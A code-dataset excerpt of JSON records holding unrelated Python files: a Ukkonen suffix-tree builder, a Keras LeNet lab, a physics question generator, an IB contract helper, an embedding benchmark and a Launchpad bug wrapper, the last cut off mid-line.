to\r\n the character of ref_text, that is referred to by txt_ptr\r\n \"\"\"\r\n return active_node.get_edge(self.refer(txt_ptr))\r\n\r\n def refer(self, ref_index):\r\n return self.ref_text[ref_index]\r\n\r\n def skip_count(self, active_node, active_length, txt_ptr, txt_end):\r\n \"\"\" Skips through nodes and edges using using active_length,\r\n to return the appropriate pointers to a point in the tree that\r\n explicit character comparison needs to begin from\r\n\r\n :param active_node: current active node\r\n :param active_length: number of known matching characters that we can skip through;\r\n length defined from the start of the root\r\n :param txt_ptr: j\r\n :param txt_end: i\r\n :return: new active_node, new active edge, index of character to begin explicit comparison\r\n in self.ref_text, remaining active_length that is too short to skip through a node\r\n\r\n :time complexity: O(m), where m is the number of nodes of the longest path in the tree\r\n :space complexity: O(1)\r\n \"\"\"\r\n n = len(self.ref_text)\r\n active_edge = None\r\n\r\n if txt_ptr < n:\r\n active_edge = self.get_edge(active_node, txt_ptr)\r\n\r\n if active_edge is not None and active_length >= len(active_edge) and txt_ptr + len(active_edge) <= txt_end:\r\n active_length -= len(active_edge)\r\n txt_ptr += len(active_edge)\r\n\r\n # while the number of remaining known matching characters is\r\n # still sufficient to get skip the entire edge\r\n while active_length >= 0 and txt_ptr <= txt_end:\r\n active_node = active_edge.next_node()\r\n active_edge = self.get_edge(active_node, txt_ptr)\r\n if active_edge is None or active_length < len(active_edge):\r\n break\r\n else:\r\n active_length -= len(active_edge)\r\n txt_ptr += len(active_edge)\r\n\r\n return active_node, active_edge, txt_ptr + active_length, active_length\r\n\r\n def traveller(self, catch_up, active_node, active_edge, remaining, txt_ptr):\r\n \"\"\" Does explicit character comparison while no mismatch is found, traverses through\r\n nodes in the way if needed. Incorporates Rule 3 & showstopper.\r\n\r\n :param catch_up: Indicates how far j is behind i, used to know when it is ok to increment i\r\n if j catches up to i eventually during explicit character comparison\r\n :param active_node: current active node\r\n :param active_edge: current active edge\r\n :param remaining: The number of characters that can be skipped on the current edge\r\n :param txt_ptr: The position to start explicit character comparison in self.ref_text\r\n\r\n :time complexity: O(k), where k is the number of characters left from txt_ptr to the end of self.ref_text\r\n :space complexity: O(1)\r\n \"\"\"\r\n n = len(self.ref_text)\r\n i = self.global_end\r\n mismatch = False\r\n reached_node = False # True if just reached node cannot even find next edge to compare, False otherwise\r\n edge_ptr = remaining + active_edge.get_text()[0]\r\n total_matched_char = 0 # total number of matching characters during explicit comparison\r\n matched_char = 0 # number of matching characters starting from current active node\r\n\r\n while edge_ptr <= i.get_end() and not mismatch and txt_ptr < n:\r\n if self.refer(edge_ptr) == self.refer(txt_ptr):\r\n reached_node = False\r\n edge_ptr += 1\r\n txt_ptr += 1\r\n matched_char += 1\r\n\r\n # showstopper\r\n if txt_ptr > i.get_end() and i.get_end() + 1 < n:\r\n i.increment_end()\r\n catch_up += 1\r\n\r\n # traverse next node if reached the end of the edge\r\n if active_edge.get_text()[1].get_end() < edge_ptr <= i.get_end() and txt_ptr < n:\r\n total_matched_char += matched_char\r\n reached_node = True\r\n active_node = active_edge.next_node()\r\n active_edge = self.get_edge(active_node, txt_ptr)\r\n if active_edge is None:\r\n break\r\n edge_ptr = active_edge.get_text()[0]\r\n matched_char = 0\r\n else:\r\n mismatch = True\r\n\r\n return txt_ptr, catch_up, active_node, active_edge, matched_char, total_matched_char, reached_node\r\n\r\n def generate_suffix_array(self, current=None, suffix_array=None):\r\n \"\"\" Retrieve suffix id from the leaves in pre-order sequence to generate\r\n suffix array from the suffix tree\r\n\r\n :time complexity: O(n), where n is the number of nodes in the tree\r\n :space complexity: O(l), where l is the number of leaves in the tree\r\n \"\"\"\r\n if current is None:\r\n current = self.root\r\n suffix_array = []\r\n return self.generate_suffix_array(current, suffix_array)\r\n else:\r\n if current.is_leaf():\r\n suffix_array.append(current.get_id())\r\n\r\n for edge in current.edges:\r\n if edge is not None:\r\n next_node = edge.next_node()\r\n self.generate_suffix_array(next_node, suffix_array)\r\n return suffix_array\r\n\r\n @staticmethod\r\n def ukkonen(string):\r\n \"\"\" ALMOST ukkonen implementation to build a suffix tree,\r\n with all rules and tricks, except suffix links\r\n\r\n :time complexity: O(n**2), since i and j outer loops are O(2n)\r\n and skip count still loosely bounded by O(n), where n is the length of the string\r\n :space complexity: O(nc), where c is the alphabet size of the tree\r\n and n is the length of the string\r\n \"\"\"\r\n suffix_tree = Tree(string)\r\n i = suffix_tree.global_end\r\n j = active_length = catch_up = 0 # active_length defined from the root\r\n n = len(suffix_tree.ref_text)\r\n\r\n i.increment_end()\r\n while i.get_end() < n:\r\n while j <= i.get_end() and j < n:\r\n active_node = suffix_tree.get_root()\r\n active_edge = active_node.get_edge(suffix_tree.refer(j))\r\n pseudo_j = j\r\n remaining = 0\r\n\r\n # skip count to locate new character to compare\r\n if active_length > 0:\r\n active_node, active_edge, pseudo_j, remaining = suffix_tree.skip_count(active_node, active_length,\r\n j, i.get_end())\r\n pseudo_j = min(pseudo_j, n - 1)\r\n\r\n if active_edge is None:\r\n insert_node = active_node\r\n insert_node_index = min(i.get_end(), pseudo_j, n - 1)\r\n active_length = max(active_length - 1, 0)\r\n catch_up = max(catch_up - 1, 0)\r\n else:\r\n # call traveller to compare characters explicitly as far as possible;\r\n # traveller increments i if necessary: Rule 3 + showstopper\r\n last_catch_up = j == i.get_end()\r\n catch_up = 0 if last_catch_up else catch_up - 1\r\n txt_ptr, catch_up, active_node, active_edge, matched_char, total_matched_char, reached_node = \\\r\n suffix_tree.traveller(catch_up, active_node, active_edge, remaining, pseudo_j)\r\n\r\n # Rule 2: break edge if mismatch occurs in the middle of an edge;\r\n # otherwise will be Rule 2: clean insert only\r\n if not reached_node:\r\n # insert internal node in existing edge\r\n old_edge_start = active_edge.get_text()[0]\r\n if matched_char == 0:\r\n old_edge_index = old_edge_start + max(remaining - 1, 0)\r\n else:\r\n old_edge_index = old_edge_start + matched_char - 1\r\n\r\n internal_node = active_edge.insert(suffix_tree.refer(old_edge_index + 1), old_edge_index)\r\n insert_node = internal_node\r\n else:\r\n insert_node = active_node\r\n\r\n insert_node_index = min(txt_ptr, n - 1)\r\n\r\n # update active length\r\n if i.get_end() == j:\r\n active_length = 0\r\n elif last_catch_up and catch_up > 0:\r\n active_length = total_matched_char - 1\r\n # j lags behind i at the start of the iteration\r\n # but then manages to catch up and matches characters exceeding i\r\n elif not last_catch_up and catch_up > 0 and total_matched_char > active_length:\r\n active_length += total_matched_char - 1\r\n else:\r\n active_length = max(active_length - 1, 0)\r\n\r\n # Rule 2: clean insert\r\n insert_node.connect(suffix_tree.refer(insert_node_index), insert_node_index, i, j)\r\n\r\n # Rule 1: extend leaf\r\n if i.get_end() == j:\r\n i.increment_end()\r\n\r\n j += 1\r\n\r\n i.decrement_end()\r\n return suffix_tree\r\n\r\n\r\ndef ukkonen_driver(file_name):\r\n \"\"\" Reads a string from the specified file, then generates a suffix array\r\n for it using a suffix_tree and writes it into output_suffix_array.txt\r\n \"\"\"\r\n with open(file_name) as input_file:\r\n contents = input_file.read().strip()\r\n\r\n suffix_tree = Tree.ukkonen(contents)\r\n suffix_array = suffix_tree.generate_suffix_array()\r\n\r\n with open(\"output_suffix_array.txt\", \"w\") as output_file:\r\n output_file.write(str(suffix_array[0]))\r\n for num in range(1, len(suffix_array)):\r\n output_file.write(\"\\n\" + str(suffix_array[num]))\r\n\r\n\r\nif __name__ == \"__main__\":\r\n filename = sys.argv[1]\r\n ukkonen_driver(filename)\r\n\r\n\r\n\r\n","sub_path":"suffix_array.py","file_name":"suffix_array.py","file_ext":"py","file_size_in_byte":13536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"519214935","text":"from typing import Optional, Tuple\n\nimport tensorflow as tf\nfrom tensorflow.keras.layers import Conv2D, Dense, Dropout, Flatten, Input, Lambda, MaxPooling2D\nfrom tensorflow.keras.models import Sequential, Model\n\n\ndef lenet(input_shape: Tuple[int, ...], output_shape: Tuple[int, ...]) -> Model:\n num_classes = output_shape[0]\n layer_size = 128\n dropout_amount = 0.2\n ##### Your code below (Lab 2)\n \n model = Sequential()\n if len(input_shape) < 3:\n model.add(Lambda(lambda x: tf.expand_dims(x, -1), input_shape=input_shape))\n input_shape = (input_shape[0], input_shape[1], 1)\n\n model.add(Conv2D(32, kernel_size=(3, 3), strides=(1, 1), padding='valid', activation='elu', input_shape=input_shape))\n model.add(Conv2D(64, kernel_size=(3, 3), strides=(1, 1), padding='valid', activation='elu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Dropout(dropout_amount))\n \n model.add(Flatten())\n \n\n model.add(Dense(layer_size, activation='elu'))\n model.add(Dropout(dropout_amount))\n \n model.add(Dense(num_classes, activation='softmax'))\n \n ##### Your code above (Lab 2)\n\n return model\n\n","sub_path":"lab2/text_recognizer/networks/lenet.py","file_name":"lenet.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"250443528","text":"import random\nimport math\n\n# Calculate root mean square velocity of a gas molecule having molar mass of m at t degree C.\n# If a gas molecule has root mean square velocity of v and is at a temperature t. What is the molar mass of the gas.\n\nqns = open('./questions.txt', 'w')\nans = open('./answers.txt','w')\n\nno_of_samples = 1500000\n\nr = 8.31\n\ndef cal1(t1,m) :\n t1 = t1 + 273 \n return math.sqrt((3*r*t1*1000)/m) \n\ndef cal2(t1,v) : \n t1 = t1 + 273 \n return (3*r*t1*1000)/(v*v) \n\ndef type1() :\n t1 = random.randint(100,1600)\n m = random.randint(1,400)\n t = random.randint(1,2)\n if t == 1 :\n q = \"Calculate root mean square velocity of a gas molecule having molar mass of \" + str(m) + \" g/mol at \" + str(t1) + \" degree C.\\n\"\n else :\n q = \"Calculate root mean square velocity of a gas molecule having molar mass of \" + str(m) + \" g/mol at \" + str(t1) + \" degree C. (R = 8.31 J/molK)\\n\"\n a = \"{:.1e}\".format(cal1(m,t1)) + \"m/s\\n\"\n return q,a\n\ndef type2() :\n t1 = random.randint(100,1600)\n v = random.randint(1000,2000)\n t = random.randint(1,2)\n if t == 1 :\n q = \"If a gas molecule has root mean square velocity of \" + str(v) + \" m/s and is at a temperature \" + str(t) + \" degree C. What is the molar mass of the gas.\\n\"\n else :\n q = \"If a gas molecule has root mean square velocity of \" + str(v) + \" m/s and is at a temperature \" + str(t) + \" degree C. What is the molar mass of the gas. (R = 8.31 J/molK)\\n\"\n a = \"{:.1e}\".format(cal2(v,t1)) + \"g/mol\\n\"\n return q,a\n\nfor i in range(no_of_samples):\n types = random.randint(1,2)\n if types == 1 :\n ques, answer = type1()\n else :\n ques, answer = type2()\n qns.write(ques)\n ans.write(answer)\n\nqns.close()\nans.close()\n","sub_path":"science/KineticTheoryOfGases/vrms/vrms.py","file_name":"vrms.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"300740639","text":"import math\n\na, b = input().split(' ')\na = int(a)\nb = int(b)\n\nflag = True\n\nlim1 = math.ceil(math.sqrt(a))\nlim2 = math.ceil(math.sqrt(b))\n\nsum = 0\nfor i in range(2, lim1):\n if a % i == 0:\n t = a // i\n sum += i\n if t != i:\n sum += t\nsum += 1 # increment for divider 1\nif sum != b:\n flag = False\n\nsum ^= sum\nfor i in range(2, lim2):\n if b % i == 0:\n t = b // i\n sum += i\n if t != i:\n sum += t\nsum += 1 # increment for divider 1\nif sum != a:\n flag = False\n\nprint('YES' if flag else 'NO')","sub_path":"informatics/112196.py","file_name":"112196.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"504009678","text":"# coding=utf-8\n# --------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for\n# license information.\n#\n# Code generated by Microsoft (R) AutoRest Code Generator.\n# Changes may cause incorrect behavior and will be lost if the code is\n# regenerated.\n# --------------------------------------------------------------------------\n\nfrom msrest.serialization import Model\n\n\nclass EnabledProtocols(Model):\n \"\"\"Class to specify which protocols are enabled.\n\n All required parameters must be populated in order to send to Azure.\n\n :param download: Required. Enable Download protocol or not\n :type download: bool\n :param dash: Required. Enable DASH protocol or not\n :type dash: bool\n :param hls: Required. Enable HLS protocol or not\n :type hls: bool\n :param smooth_streaming: Required. Enable SmoothStreaming protocol or not\n :type smooth_streaming: bool\n \"\"\"\n\n _validation = {\n 'download': {'required': True},\n 'dash': {'required': True},\n 'hls': {'required': True},\n 'smooth_streaming': {'required': True},\n }\n\n _attribute_map = {\n 'download': {'key': 'download', 'type': 'bool'},\n 'dash': {'key': 'dash', 'type': 'bool'},\n 'hls': {'key': 'hls', 'type': 'bool'},\n 'smooth_streaming': {'key': 'smoothStreaming', 'type': 'bool'},\n }\n\n def __init__(self, **kwargs):\n super(EnabledProtocols, self).__init__(**kwargs)\n self.download = kwargs.get('download', None)\n self.dash = kwargs.get('dash', None)\n self.hls = kwargs.get('hls', None)\n self.smooth_streaming = kwargs.get('smooth_streaming', None)\n","sub_path":"azure-mgmt-media/azure/mgmt/media/models/enabled_protocols.py","file_name":"enabled_protocols.py","file_ext":"py","file_size_in_byte":1773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"582740641","text":"####\n#### 2 places need to change\n# 1: muHead(),\n# 2: myContract_Specs for OPT specifications\n\nfrom ContractSamples import ContractSamples\nimport datetime\nimport time\nimport os\nimport subprocess\nimport numpy as np\n\ndef myHead():\n myHistDate = [\"20201022 23:59:00 GMT\", \"50 D\", \"20 mins\", \"MIDPOINT\"]\n #myHistDate = [\"20201030 23:59:00 GMT\", \"30 D\", \"1 hour\", \"MIDPOINT\"]\n #myHistDate = [\"20201106 23:59:00 GMT\", \"300 D\", \"1 day\", \"MIDPOINT\"]\n myHistDate = [\"20201106 23:59:00 GMT\", \"360 D\", \"1 day\", \"MIDPOINT\"]\n myHistDate = [\"20191230 23:59:00 GMT\", \"300 D\", \"1 day\", \"MIDPOINT\"]\n\n mySymbol = 'SPY'\n myType = 'STK'\n return mySymbol, myType, myHistDate\n#\n# Typical calling sequence below\n# mySymbol, myType, myHistDate = myHead()\n# myContracts = myContract_Specs(mySymbol, myType)\n\ndef myContract_Specs(mySymbol, myType):\n myRights = ['C', 'P']\n myStrikes = [0] * 1000\n myExpDates = [''] * 1000\n NF = 0\n # myType = 'OPT'\n # mySymbol = 'QQQ'\n\n print(mySymbol, myType)\n if (myType == 'STK'):\n myContract = ContractSamples.mySTK_Contract()\n myContract.symbol = mySymbol\n elif (myType == 'FUT'):\n myContract = ContractSamples.myFUT_Contract()\n myContract.symbol = mySymbol\n elif (myType == 'OPT'):\n myContract = ContractSamples.myOPT_Contract()\n myContract.symbol = mySymbol\n elif (myType == 'FOP'):\n myContract = ContractSamples.myFUTOPT_Contract()\n myContract.symbol = mySymbol\n else:\n print('No valid contract type is specified myType =', myType)\n return\n\n if (myType == 'STK' or myType == 'FUT'):\n return myContract\n\n # Options Contracts. Changes could be made here\n\n if (mySymbol == 'LYFT'):\n myStrikes = [24.0, 24.5, 25., 25.5, 26.0, 26.5, 27.0, 27.5, 28.0, 28.5, 29.0, 29.5, 30.0]\n myExpDates = ['1023', '1030', '1106','1113','1120','1127', '1204','1211','1218']\n myExpDates = ['1113']#,'1120','1127', '1204','1211','1218']\n myExpDates = ['1023','1030', '1106']\n for i in range(len(myExpDates)):\n myExpDates[i] = '2020' + myExpDates[i]\n #\n elif (mySymbol == 'JETS'):\n myStrikes = [16.5, 17.0, 17.5, 18.0, 18.5, 19.0]\n myExpDates = ['1023', '1030', '1106'] #, '1113', '1120', '1127', '1218']\n myExpDates = ['1106', '1113', '1120', '1127', '1218']\n for i in range(len(myExpDates)):\n myExpDates[i] = '2020' + myExpDates[i]\n #\n elif (mySymbol == 'SPY'):\n for i in range(41):\n myStrikes[i] = 320.0 + i * 1 # 320 to 360\n myExpDates = ['1023', '1026', '1028', '1030',\n '1102'] # , '1104', '1106', '1111', '1113', '1116', '1118', '1120']\n for i in range(len(myExpDates)):\n myExpDates[i] = '2020' + myExpDates[i]\n #\n elif (mySymbol == 'QQQ'):\n for i in range(41):\n myStrikes[i] = 260 + i * 1 # 260 to 300\n myExpDates = ['1023', '1030', '21106', '1113', '1120', '1127', '1218']\n for i in range(len(myExpDates)):\n myExpDates[i] = '2020' + myExpDates[i]\n #\n elif (mySymbol == 'ES'):\n myStrikes = [0] * 61\n for i in range(len(myStrikes)):\n myStrikes[i] = 3200.0 + i * 5 # 3200 to 3500\n myExpDates = ['1023', '1026', '1028', '1030',\n '1102'] # , '1104', '1106', '1111', '1113', '1116', '1118', '1120']\n for i in range(len(myExpDates)):\n myExpDates[i] = '2020' + myExpDates[i]\n else:\n print('No valid symbol is specified for OPT aor FOP contracts. mySymbol = ', mySymbol)\n return\n\n ii = 0\n myContracts = [None] * 1000\n for right in myRights:\n for strike in myStrikes:\n for expdate in myExpDates:\n if (myType == 'OPT'):\n myContract = ContractSamples.myOPT_Contract()\n elif (myType == 'FOP'):\n myContract = ContractSamples.myFUTOPT_Contract()\n myContract.symbol = mySymbol\n myContract.right = right\n myContract.strike = strike\n myContract.lastTradeDateOrContractMonth = expdate\n myContracts[ii] = myContract\n ii = ii + 1\n #print('ii=',ii-1,myContracts[ii-1])\n\n NF = ii\n myContracts = myContracts[0:NF]\n # for i in range(NF):\n # print('---- All contracts', i, ' ', myContracts[i])\n\n if(NF==1):\n myContracts = myContracts[0:NF]\n\n return myContracts\n\n\ndef from_myContracts(Contracts, input):\n NF = len(Contracts)\n Data = [None]*NF\n if(input == 'Right'):\n i=0\n for contract in Contracts:\n Data[i] = contract.right\n i = i+1\n elif (input == 'Strike'):\n i = 0\n for contract in Contracts:\n Data[i] = contract.strike\n i = i + 1\n elif (input == 'ExpDate'):\n i = 0\n for contract in Contracts:\n Data[i] = contract.lastTradeDateOrContractMonth\n i = i + 1\n\n data2 = list(set(Data))\n data3 = np.sort(data2)\n return data3 #unique values\n#\n# def my_nearest_filename(filename):\n# myfolder, symbol, secType, myenddate, myduration, \\\n# myfreq, myMidType, right, strike, Exp = parse_filename(filename) #all strings\n#\n# fileseg1 = myfolder + symbol + '_' + secType + '_'\n# fileseg2 = '_' + myfreq + '_' + myMidType\n# if ((secType == 'OPT') or (secType == 'FOP')):\n# fileseg2 = fileseg2 + '_' + right +'_'+str(strike) + '_'+ Exp + '.csv'\n# else:\n# fileseg2 = fileseg2+'.csv'\n#\n# lsnames = myfolder + fileseg1 + '*' +fileseg2\n# cmd = 'ls ' + lsnames + ' > junk2.ps'\n# os.system(cmd)\n# with open(\"junk.ps\", \"r\") as junkfile:\n# texts = junkfile.readlines()\n# enddays = [20201022] * 1000\n# durdays = [100] * 1000\n#\n# dd1\n# i = 0\n# for line in texts:\n# line = line.rstrip().lstrip()\n# a = line.split(\"_\")\n# enddays[i] = int(a[2])\n# durdays[i] = int(a[3][0:len(a[3] - 1)])\n# i = i + 1\n# NC = i\n# enddays = enddays[0:NC]\n# durdays = durdays[0:NC]\n#\n# filename = symbol + '_' + secType + '_' + myenddate + '_' + myduration + '_' + myfreq + '_' + myMidType\n# if ((secType == 'OPT') or (secType == 'FOP')):\n# filename = filename + '_' + right + '_' + strike + '_' + Exp\n#\n#\n\ndef parse_filename(filename):\n\n c = filename.split('/')\n myfolder = c[0]+'/'+c[1]+'/'+c[2]+'/'\n\n cc = c[3]\n ccc = f1.split('_')\n symbol = ccc[0]\n secType = ccc[1]\n myenddate = ccc[2]\n myduration = ccc[3]\n myfreq = ccc[4]\n myMidType = ccc[5]\n right = 'C'\n strike = '0'\n Exp = '20201030'\n if ((secType == 'OPT') or (secType == 'FOP')):\n right = ccc[6]\n strike = ccc[7]\n Exp = ccc[8]\n\n return myfolder, symbol, secType, myenddate, myduration, myfreq, myMidType,right,strike,Exp\n\ndef print_list(x2):\n print('in print_list ---> type(x2), len(x2),type(x2[0]), x2[0], x2[-1]):')\n print(' ',type(x2), len(x2), type(x2[0]), x2[0],' .... to ....', x2[-1])\n\ndef myfilenames_req(myHistDate, myContracts):\n\n try:\n NF = len(myContracts)\n except:\n NF = 1 #not a list of contracts\n\n\n if(NF == 1):\n myContracts = [myContracts]*1\n\n print(myHistDate)\n# for contract in Contracts:\n# print(contract)\n\n myjunk = myHistDate\n myenddate = myjunk[0].split(\" \")[0]\n myduration = myjunk[1].split(\" \")[0] + myjunk[1].split(\" \")[1]\n myfreq = myjunk[2].split(\" \")[0] + myjunk[2].split(\" \")[1]\n mytype = myjunk[3]\n myfilenames = [''] * NF\n\n for ii in range(NF):\n myfolder = 'data/' + str(myContracts[ii].symbol) + '/' + str(myContracts[ii].secType) + '/'\n if (os.path.isdir('data/' + str(myContracts[ii].symbol)) == False):\n os.mkdir('data/' + str(myContracts[ii].symbol))\n if (os.path.isdir(myfolder) == False):\n os.mkdir(myfolder)\n myfilenames[ii] = str(myContracts[ii].symbol) + '_' + str(myContracts[ii].secType) \\\n + '_' + myenddate + '_' + myduration + '_' + myfreq + '_' + mytype\n if ((myContracts[ii].secType == 'OPT') or (myContracts[ii].secType == 'FOP')):\n myfilenames[ii] = myfilenames[ii] + '_' + myContracts[ii].right + '_' \\\n + str(myContracts[ii].strike) + '_' \\\n + myContracts[ii].lastTradeDateOrContractMonth\n myfilenames[ii] = myfolder + myfilenames[ii] + '.csv'\n\n for i in range(NF):\n print('---- All filenames', i, ' ', myfilenames[i])\n\n if(NF == 1):\n myfilenames = myfilenames[0]\n\n return myfilenames\n#\n#\n\n#\n# #####################################################\n#\n# myqueryTime = (datetime.datetime.today() - datetime.timedelta(days=10)).strftime(\"%Y%m%d %H:%M:%S\")\n# myqueryTime = \"20201022 24:00:00 GMT\" # end data\n# myHistDate = [myqueryTime, \"50 D\", \"20 mins\", \"MIDPOINT\"] # TRADES BID-ASK MIDPOINT\n# #\n# mySymbol = 'JETS' #'ES' #LYFT'\n# myType = 'OPT' #'FUT' #FOP' #OPT' #STK'\n# #\n# myContracts = myContract_Specs(mySymbol, myType)\n# # filenames = myfilenames_req(myHistDate, myContracts)\n#\n# filename = get_filename(myHistDate, 'LYFT', 'OPT', 'C', 26.0, '20201030')\n#\n# print(filename)","sub_path":"myContract_Spec.py","file_name":"myContract_Spec.py","file_ext":"py","file_size_in_byte":9366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"282546683","text":"\"\"\"\n Copyright (c) 2022, NVIDIA CORPORATION.\n \n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n \n http://www.apache.org/licenses/LICENSE-2.0\n \n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n\"\"\"\n\nimport time\nimport argparse\nimport numpy as np\nimport tensorflow as tf\nimport horovod.tensorflow as hvd\n\nfrom sparse_operation_kit import experiment as sok\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--batch_size\", type=int, default=8192)\n parser.add_argument(\"--hotness\", type=int, default=2)\n parser.add_argument(\"--combiner\", type=str, default=\"sum\")\n parser.add_argument(\"--key_space\", type=int, default=1024 * 1024)\n parser.add_argument(\"--dim\", type=int, default=4)\n parser.add_argument(\"--iters\", type=int, default=100)\n args = parser.parse_args()\n args.iters = max(args.iters, 10)\n\n hvd.init()\n gpus = tf.config.experimental.list_physical_devices(\"GPU\")\n for gpu in gpus:\n tf.config.experimental.set_memory_growth(gpu, True)\n if gpus:\n tf.config.experimental.set_visible_devices(gpus[hvd.local_rank()], \"GPU\")\n sok.init()\n\n offsets = np.random.randint(1, args.hotness + 1, args.iters * args.batch_size)\n offsets = tf.convert_to_tensor(offsets, dtype=tf.int64)\n values = np.random.randint(0, args.key_space, tf.reduce_sum(offsets))\n values = tf.convert_to_tensor(values, dtype=tf.int64)\n total_indices = tf.RaggedTensor.from_row_lengths(values, offsets)\n\n v = tf.Variable(tf.random.normal(shape=[args.key_space, args.dim]), dtype=tf.float32)\n sok_v = sok.Variable(v)\n\n @tf.function\n def sok_step(param, indices):\n with tf.GradientTape() as tape:\n embedding = sok.lookup_sparse(param, indices, None, args.combiner)\n loss = tf.reduce_sum(embedding)\n grads = tape.gradient(loss, [param])\n return loss, grads\n\n ts = []\n t = time.time()\n for i in range(args.iters):\n ts.append(time.time() - t)\n t = time.time()\n left = args.batch_size // hvd.size() * hvd.rank()\n left += i * args.batch_size\n right = args.batch_size // hvd.size() * (hvd.rank() + 1)\n right += i * args.batch_size\n loss, _ = sok_step(sok_v, total_indices[left:right])\n loss = loss.numpy()\n sok_result = sum(ts[5:]) / (args.iters - 5) * 1000\n\n @tf.function\n def tf_step(param, indices):\n with tf.GradientTape() as tape:\n embedding = tf.nn.embedding_lookup_sparse(param, indices, None, combiner=args.combiner)\n loss = tf.reduce_sum(embedding)\n grads = tape.gradient(loss, [param])\n return loss, grads\n\n ts = []\n t = time.time()\n for i in range(args.iters):\n ts.append(time.time() - t)\n t = time.time()\n left = args.batch_size // hvd.size() * hvd.rank()\n left += i * args.batch_size\n right = args.batch_size // hvd.size() * (hvd.rank() + 1)\n right += i * args.batch_size\n sp_ids = total_indices[left:right].to_sparse()\n loss, _ = tf_step(v, sp_ids)\n loss = loss.numpy()\n tf_result = sum(ts[5:]) / (args.iters - 5) * 1000\n\n print(\"---------------------------------------------\")\n print(\"* batch_size : %d\" % args.batch_size)\n print(\"* local batch_size : %d\" % (args.batch_size // hvd.size()))\n print(\"* hotness : %d\" % args.hotness)\n print(\"* combiner : %s\" % args.combiner)\n print(\"* key_space : %d\" % args.key_space)\n print(\"* dim : %d\" % args.dim)\n print(\"---------------------------------------------\")\n print(\"* sok.lookup_sparse : %.3f ms/iter\" % sok_result)\n print(\"* tf lookup_sparse : %.3f ms/iter\" % tf_result)\n print(\"---------------------------------------------\")\n","sub_path":"sparse_operation_kit/sparse_operation_kit/experiment/benchmark/lookup_sparse_benchmark.py","file_name":"lookup_sparse_benchmark.py","file_ext":"py","file_size_in_byte":4187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"317599677","text":"def myscript():\n d = {}\n list2 = []\n# for line in open(\"/Users/kathy/Google\\ Drive/Python/UW\\ 2015/Course\\ I/workspace/IntroPython2015/Examples/students.txt\"):\n for line in open('students.txt'):\n\n text = line[line.index(\":\"):].rstrip()\n# print(text)\n list1 = text.split(\" \")\n# print(list1)\n# for n in list1:\n# if n not in d.keys():\n# d[n] = 1\n# else:\n# d[n] += 1\n for n in list1:\n if n not in list2:\n list2.append(n)\n# f.closed\n\n# print(d)\n# print(list2)\n unique = set(list2)\n print(unique)\n\n# for line in open('students.txt'):\n# print(line)\n# print(\"****\")\n\nmyscript()\n","sub_path":"students/kathleen/session04/fileio.py","file_name":"fileio.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"633319316","text":"# This is a wrapper, which converts launchpad bug structure into a internal bug object.\n#\n# When you get certain properties of the bug (e.g. assignee), it usually does additional query to LP.\n# This wrapper avoids doing any calls to Launchpad by going into internal representation of the object and grabbing the info from JSON.\n\nimport string\nimport lpdata\n\nFIELDS_TO_COPY = [\n \"date_assigned\",\n \"date_closed\",\n \"date_confirmed\",\n \"date_created\",\n \"date_fix_committed\",\n \"date_fix_released\",\n \"date_in_progress\",\n \"date_incomplete\",\n \"date_left_closed\",\n \"date_left_new\",\n \"date_triaged\",\n \"importance\",\n \"status\"\n]\n\nFIELDS_TO_COPY_FROM_JSON = [\n \"assignee_link\",\n \"milestone_link\",\n \"title\",\n \"web_link\"\n]\n\nclass Bug():\n\n # I'm too lazy to deal with UTF-8 at this point\n # need this make sure the bugs from Chinese people don't cause exceptions\n def sanitize_string(self, s):\n return filter(lambda x: x in string.printable, s)\n\n def __init__(self, lpbug):\n \n # straight copy fields from the lpbug object. this do not make any calls to LP\n for name in FIELDS_TO_COPY:\n setattr(self, name, getattr(lpbug, name))\n\n # copy fields from JSON internals to avoid additional \"lazy init\" queries to LP (as it would kill performance)\n for name in FIELDS_TO_COPY_FROM_JSON:\n setattr(self, name, lpbug._wadl_resource.representation[name])\n\n # extract assignee (i.e. https://api.launchpad.net/1.0/~dshulyak -> dshulyak)\n self.assignee = str(self.assignee_link).rsplit('~', 1)[-1]\n self.assignee_link = \"https://launchpad.net/~\" + self.assignee\n if (self.assignee is None) or (self.assignee == \"None\"):\n self.assignee = \"\"\n self.assignee_link = \"\"\n\n # extract milestone (i.e. https://api.launchpad.net/1.0/fuel/+milestone/4.1 -> 4.1)\n self.milestone = str(self.milestone_link).rsplit('/', 1)[-1]\n\n # extract title (i.e. Bug #1247284 in Fuel for OpenStack: \"Verify Networks doesn't wait long enough for dhcp response\")\n self.title = self.sanitize_string(self.title).split(':', 1)[1].strip(\" \\\"\")\n\n # extract id from web link (i.e. https://bugs.launchpad.net/fuel/+bug/1247284 -> 1247284)\n self.id = str(self.web_link).rsplit('/', 1)[-1]\n\n def get_status_changes(self):\n # Bug statuses:\n # * Incomplete -> date_incomplete\n # * New (not targeted to any release) -> date_created\n # * Open -> date_triaged (date_confirmed, date_left_new, date_assigned)\n # * In Progress -> date_in_progress\n # * Resolved -> date_fix_committed\n # * Verified -> date_fix_released\n\n # if the bug is \"New\", it should not be displayed on the chart\n if self.status in 